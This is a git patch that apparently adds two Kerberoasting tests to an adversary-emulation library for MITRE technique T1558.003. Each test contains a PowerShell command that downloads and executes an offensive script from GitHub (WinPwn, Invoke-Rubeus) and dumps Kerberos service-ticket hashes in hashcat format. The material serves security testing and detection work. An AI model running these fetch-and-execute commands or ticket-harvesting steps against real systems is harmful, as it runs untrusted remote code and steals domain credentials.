From 4530cd085ef397e9cb6201023c83aa36ba6e6280 Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Thu, 12 May 2022 18:36:14 -0500 Subject: [PATCH] Update T1558.003.yaml (#1955) * Update T1558.003.yaml Kerberoasting technique via function of WinPwn PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn * Update T1558.003.yaml update fix * Update T1558.003.yaml final fix/update * Update T1558.003.yaml update and fixed Co-authored-by: Carrie Roberts --- atomics/T1558.003/T1558.003.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml index 4c3cca33..3f958370 100644 --- a/atomics/T1558.003/T1558.003.yaml +++ b/atomics/T1558.003/T1558.003.yaml @@ -149,3 +149,24 @@ atomic_tests: Add-Type -AssemblyName System.IdentityModel setspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } name: powershell + +- name: WinPwn - Kerberoasting + description: Kerberoasting technique via function of WinPwn + supported_platforms: + - windows + executor: + command: |- + $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' + iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') + Kerberoasting -consoleoutput -noninteractive + name: powershell + +- name: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus + description: PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn + supported_platforms: + - windows + executor: + command: |- + iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1') + Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap" + name: powershell